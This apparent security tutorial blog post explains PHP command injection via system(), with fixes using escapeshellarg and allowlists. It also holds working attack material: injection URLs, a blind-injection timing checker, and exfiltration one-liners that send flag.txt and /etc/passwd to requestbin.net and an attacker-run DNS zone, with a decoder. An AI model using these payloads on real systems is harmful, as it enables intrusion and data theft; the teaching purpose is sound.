Pwning PHP: Remote Code Execution

Mudhalai Mr
Apr 18 · 2 min read

Remote code execution (RCE) lets an attacker run code of their choosing on the vulnerable machine, with whatever privileges the web server process has. RCE bugs are almost always rated critical under CVSS (well, what more do you need than that?)


Note: Check out this blog for more PHP Pwning and to learn why PHP is targeted.

System:

Similar to the system() function in C, system() in PHP hands its argument to the shell (/bin/sh on Linux), runs it, and echoes the command's output into the response. If unsanitized user input reaches it, the attacker gets to pick the command: that is command injection, and command injection is RCE.

<?php
$cmd = $_GET['cmd'];   // untrusted input straight from the query string
system($cmd);          // run by /bin/sh; output is echoed into the response
?>

http://www.example.com/?cmd=command (e.g. ?cmd=id or ?cmd=uname+-a; spaces go as + or %20)

The PHP documentation warns developers not to pass user-supplied data to it without first escaping it with escapeshellarg() or escapeshellcmd(). Escaping alone is a thin defence, though: the safe pattern is to never let user input choose the command, to validate the argument against an allowlist, and only then to escape it.
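To make that concrete, here is the vulnerable sink next to two hardened versions. This is an added example written for this page, not code from the original post; it assumes PHP 7.4+ on Linux and a hypothetical "host" query parameter, with ping standing in for whatever tool the application needs to shell out to.

```php
<?php
// Added example, not code from the original post: the vulnerable sink next to
// two hardened versions. Assumes PHP 7.4+ on Linux and a hypothetical "host"
// query parameter; ping is just a stand-in for any command the app shells to.

// 1. Vulnerable: the raw parameter becomes part of the command line, so
//    ?host=127.0.0.1;id runs ping and then id. Same bug as system($_GET['cmd']).
function ping_vulnerable(string $host): string
{
    $out = shell_exec('ping -c 1 ' . $host);
    return is_string($out) ? $out : '';
}

// 2. Escaped: escapeshellarg() wraps the value in single quotes and escapes any
//    embedded quotes, so ; | & ` $( ) and newlines become ordinary characters.
//    ?host=127.0.0.1;id turns into  ping -c 1 '127.0.0.1;id'  and simply fails.
//    It does NOT stop option injection: ?host=-f still hands ping the -f flag.
function ping_escaped(string $host): string
{
    $out = shell_exec('ping -c 1 ' . escapeshellarg($host));
    return is_string($out) ? $out : '';
}

// 3. Allowlisted: validate the shape of the input before any shell is involved
//    and reject everything else. No leading '-', only hostname characters, at
//    most 253 bytes. Escaping is kept as defence in depth.
function ping_allowlisted(string $host): string
{
    if (!preg_match('/^[A-Za-z0-9][A-Za-z0-9.-]{0,252}$/', $host)) {
        throw new InvalidArgumentException('invalid host');
    }
    $out = shell_exec('ping -c 1 ' . escapeshellarg($host));
    return is_string($out) ? $out : '';
}

// Request handler: only the allowlisted version is ever wired to user input.
header('Content-Type: text/plain');
try {
    echo ping_allowlisted($_GET['host'] ?? '127.0.0.1');
} catch (InvalidArgumentException $e) {
    http_response_code(400);
    echo "rejected\n";
}
```

The point of version 3 is that escapeshellarg() only neutralises shell metacharacters; a value beginning with "-" still reaches ping as an option, which is why the allowlist forbids a leading dash rather than trying to clean it up.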

Other PHP functions that run shell commands:

exec(): executes an external program and returns the last line of output (all lines via its array argument)
passthru(): executes an external program and sends its raw output straight to the browser
shell_exec() and the backtick operator: run a command via the shell and return the full output as a string
popen() and proc_open(): open a process with pipes to its stdin and stdout

When the output is not returned in the response, the bug is a blind RCE. How do we verify it then? With time delays: inject a command that takes a known number of seconds and compare the response time against a baseline request,

sleep 10 delays by 10 secs

ping -c 10 192.168.0.2 delays by about 10 secs (one packet per second by default, so it depends on ping's interval and the host being reachable)

ping -c 20 192.168.0.2 delays by about 20 secs

Repeat the check with a second delay value (5, then 10) so that network jitter or a slow page is not mistaken for injection.

If we need to read the output of the command, we can redirect it into a file under the web root and fetch that file over HTTP (this only works if the web server user can write there),

uname -i > /var/www/html/info.txt

http://www.example.com/info.txt

Shell separators let us chain several commands inside one parameter: ";" and a newline run the next command unconditionally, "&&" runs it only if the first one succeeded, "||" only if it failed, "|" pipes the output of one command into the next as input, and "&" backgrounds the first command. Remember that "&" also separates URL parameters, so it must be sent as %26 (and spaces as + or %20) or the web server will split the payload before it reaches system().
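The time-delay check and the encoding point above, put together as a small command-line checker. This is an added example written for this page, not code from the original post; it assumes a target like the vulnerable script above, reached at the URL given as its first argument, with a hypothetical "cmd" parameter.

```php
<?php
// Added example, not code from the original post: a CLI checker for blind
// command injection using the time-delay trick. Assumes a target like the
// script on this page, with a hypothetical "cmd" parameter.
// Usage: php blind_check.php 'http://www.example.com/'

const DELAY   = 5;   // seconds the injected sleep should add
const SAMPLES = 2;   // repeat each measurement to smooth out network jitter

// Builds the injection URL. http_build_query() percent-encodes ; & | and
// spaces, so "id; sleep 5" arrives as one parameter instead of being split
// by the web server at an '&'.
function inject_url(string $base, string $cmd): string
{
    return $base . '?' . http_build_query(['cmd' => $cmd]);
}

// Fetches the URL and returns how long the response took, in seconds.
function timed_get(string $url, int $timeout): float
{
    $ctx = stream_context_create(['http' => [
        'timeout'       => $timeout,
        'ignore_errors' => true,   // a 500 still counts as a timed response
    ]]);
    $start = microtime(true);
    @file_get_contents($url, false, $ctx);
    return microtime(true) - $start;
}

// Smallest of several samples: noise only ever makes a request slower.
function min_time(string $url, int $timeout): float
{
    $best = INF;
    for ($i = 0; $i < SAMPLES; $i++) {
        $best = min($best, timed_get($url, $timeout));
    }
    return $best;
}

$target   = $argv[1] ?? 'http://www.example.com/';
$timeout  = DELAY * 3;
$baseline = min_time(inject_url($target, 'id'), $timeout);
$delayed  = min_time(inject_url($target, 'id; sleep ' . DELAY), $timeout);

printf("baseline %.2fs, with sleep %d: %.2fs\n", $baseline, DELAY, $delayed);
if ($delayed - $baseline >= DELAY - 1) {
    echo "delay observed: likely blind command injection\n";
} else {
    echo "no delay: not injectable here, or sleep is unavailable on the target\n";
}
```

Run it twice with different DELAY values before calling the finding confirmed; a single slow response proves nothing, a response that is consistently slower by exactly the number of seconds you asked for does.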

If the target can reach a host we control, we can also read the output out of band by sending it through another protocol,

curl http://requestbin.net/your-server?output=`cat flag.txt`

nslookup `cat /etc/passwd`.attacker.domain

The DNS version needs care: the backticks run on the target's shell, but /etc/passwd contains colons, slashes and newlines, which are not valid in a DNS name, and each label is limited to 63 bytes. In practice the output has to be hex- or base32-encoded and split into several numbered queries; a single query can carry only a small file, like flag.txt, and even then only if its contents happen to be DNS-safe.
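Here is that DNS exfiltration done properly, as an added example written for this page rather than code from the original post: the one-liner the target runs, plus the attacker-side encoder and decoder so you can see what the queries look like and reassemble them from a query log. The zone attacker.domain and the sample passwd lines are constructed for the example.

```php
<?php
// Added example, not code from the original post: exfiltrating command output
// through DNS queries in a form that actually resolves. Data is hex-encoded
// and split into numbered 30-byte chunks (60 hex chars, under the 63-byte
// label limit). The zone and the sample passwd lines are constructed.

// What the target runs (needs xxd; where it is absent,
// od -An -tx1 -v /etc/passwd | tr -d ' \n' | fold -w 60 gives the same lines).
// Each line of 60 hex characters carries 30 bytes of the file.
const TARGET_ONELINER =
    'i=0; for c in $(xxd -p -c 30 /etc/passwd); do nslookup $i.$c.attacker.domain; i=$((i+1)); done';

// Attacker-side model of the queries the one-liner produces.
function encode_dns(string $data, string $zone, int $bytesPerQuery = 30): array
{
    $names = [];
    foreach (str_split(bin2hex($data), $bytesPerQuery * 2) as $i => $chunk) {
        $names[] = "$i.$chunk.$zone";
    }
    return $names;
}

// Reassembles the file from the names seen in the authoritative server's query
// log. Queries arrive out of order and may repeat (resolvers retry), so the
// sequence number is used as the key and duplicates overwrite harmlessly.
function decode_dns(array $queries, string $zone): string
{
    $parts = [];
    $re = '/^(\d+)\.([0-9a-f]+)\.' . preg_quote($zone, '/') . '\.?$/i';
    foreach ($queries as $q) {
        if (preg_match($re, $q, $m)) {
            $parts[(int) $m[1]] = $m[2];
        }
    }
    ksort($parts);
    return (string) hex2bin(implode('', $parts));
}

// Constructed sample standing in for the real /etc/passwd.
$sample  = "root:x:0:0:root:/root:/bin/bash\n"
         . "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n";
$queries = encode_dns($sample, 'attacker.domain');
shuffle($queries);              // simulate out-of-order arrival
$queries[] = $queries[0];       // and a resolver retry

echo TARGET_ONELINER, "\n\n";
foreach ($queries as $q) {
    echo $q, "\n";
}
echo "\nroundtrip ", decode_dns($queries, 'attacker.domain') === $sample ? "OK" : "FAILED", "\n";
```

The one-liner itself goes into the cmd parameter, so it must be URL-encoded like any other payload (the ";", "$" and spaces in particular), and you need to be running, or be able to read the logs of, the authoritative name server for attacker.domain to collect the queries.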

RCE has far more variants than I have covered here, and they are worth the time. For example, there are many techniques for bypassing web application firewalls and other sanitization routines, and there is a clever method for tunnelling RCE through DNS queries. Here are some resources to keep your quest going:

https://owasp.org/www-community/attacks/Code_Injection
https://blog.qualys.com/product-tech/2019/10/30/php-remote-code-execution-vulnerability-cve-2019-11043
https://blog.hacktivesecurity.com/index.php?controller=post&action=view&id_post=41

Developer Student Clubs SASTRA

DSC SASTRA Deemed To Be University is one of the Google Developers Community chapter for college students. We help students bridge the gap between theory and practice and grow their knowledge by providing a peer-to-peer learning environment, by conducting workshops, study jams.

Written by Mudhalai Mr

AKA Gowtham, student at SASTRA Deemed University, core team member of DSC SASTRA
